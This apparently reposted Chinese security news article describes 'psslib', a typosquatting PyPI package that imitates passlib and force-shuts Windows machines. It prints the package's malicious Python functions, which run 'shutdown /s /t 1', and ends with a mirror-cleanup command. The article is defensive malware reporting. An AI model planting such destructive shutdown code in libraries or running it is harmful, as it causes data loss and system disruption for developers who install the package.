【网络安全】恶意 Python 包“psslib”仿冒 passlib,可导致 Windows 系统关闭

文章目录

恶意 Python 包"psslib"仿冒 passlib

Socket 的威胁研究团队发现了一个名为 psslib 的恶意 Python 包,旨在以提供密码安全功能为幌子突然关闭 Windows 系统。

该软件包由威胁行为者使用别名 umaraq 编写,是合法 passlib 库的错误拼写,passlib 库是数百万开发人员信赖,并且广泛使用的密码哈希工具包。

"恶意 psslib 包通过将自己伪装成安全实用程序来利用这种信任,同时包含可能导致立即数据丢失和系统中断的代码,"

攻击从一个名称技巧开始:psslib 与 passlib 非常相似,可能希望欺骗快速键入或依赖自动完成的开发人员。passlib 每月下载量超过 890 万次。

"Socket 的 AI Scanner 将 psslib 标记为恶意,因为它具有破坏性的系统关闭行为。"

导入后,由于密码输入错误而触发,psslib 将执行 Windows 关机命令 (shutdown /s /t 1),使计算机在 1 秒内关闭电源。

该软件包假装通过名为 spc() 的函数提供密码保护,并使用 easygui.enterbox() 进行用户输入。如果用户输入与预设值不匹配,它将立即关闭系统。

bash 复制代码
def spc(password):
    # Malicious code: Forces immediate system shutdown on incorrect input
    if easygui.enterbox('enter password:-') != password:
        os.system("shutdown /s /t 1")  # Shutdown in 1 second

除此之外,psslib 还包括另外两个函数 --- src() 和 error() --- 它们根本不在进行任何身份验证的情况下关闭系统。

bash 复制代码
def src():
    # Directly forces system shutdown without user input
    os.system("shutdown /s /t 1")

def error(message):
    # Writes an error message and forces system shutdown
    sys.stderr.write(message)
    os.system("shutdown /s /t 1")

这些额外的向量确保即使对库的有限使用也可能立即危及开发人员的计算机,尤其是在以提升的权限运行的环境中。

该恶意软件专门针对基于 Windows 的开发环境,在这些环境中,关闭命令有效且经常被忽视。虽然由于作系统命令差异,有效负载在 Linux 或 macOS 上无害地失败,但该软件包的 Windows 特定性质表明了目标意图。

"攻击是完全有效的。shutdown 命令按预期执行,强制立即关闭系统,这可能导致:未保存的工作和数据丢失、打开的文件和数据库损坏以及正在运行的服务中断。

如何避免psslib的威胁

需要现在mirror服务器上查看是否存在psslib的威胁包

如果存在,可以手动进行删除:

bash 复制代码
sudo bandersnatch delete psslib

相关推荐
2401_8414956413 分钟前
【自然语言处理】Transformer模型
人工智能·python·深度学习·算法·语言模型·自然语言处理·transformer
m0_7482336413 分钟前
C++与Python:内存管理与指针的对比
java·c++·python
深度学习lover31 分钟前
<数据集>yolo煤矿安全帽识别数据集<目标检测>
人工智能·python·深度学习·yolo·目标检测·计算机视觉·煤矿安全帽识别
程序员爱钓鱼37 分钟前
Python编程实战 · 基础入门篇 | 字典(dict)
后端·python·ipython
程序员爱钓鱼39 分钟前
Python编程实战 · 基础入门篇 | 集合(set)
后端·python·ipython
B站_计算机毕业设计之家1 小时前
计算机视觉:python车牌识别检测系统 YOLOv8 深度学习pytorch技术 LPRNet车牌识别算法 CCPD2020数据集 ✅
大数据·python·深度学习·机器学习·计算机视觉·数据分析·车牌识别
这个世界的真神1 小时前
【每日算法】 洛谷 P12341 【[蓝桥杯 2025 省 A/Python B 第二场] 消消乐】 2025.10.26
python·算法·蓝桥杯
wudl55661 小时前
JDK 21 API增强详解
java·开发语言·windows
l1t1 小时前
利用DeepSeek改写递归CTE SQL语句为Python程序及优化
数据库·人工智能·python·sql·算法·性能优化·deepseek
m0_748233642 小时前
【C++list】底层结构、迭代器核心原理与常用接口实现全解析
c++·windows·list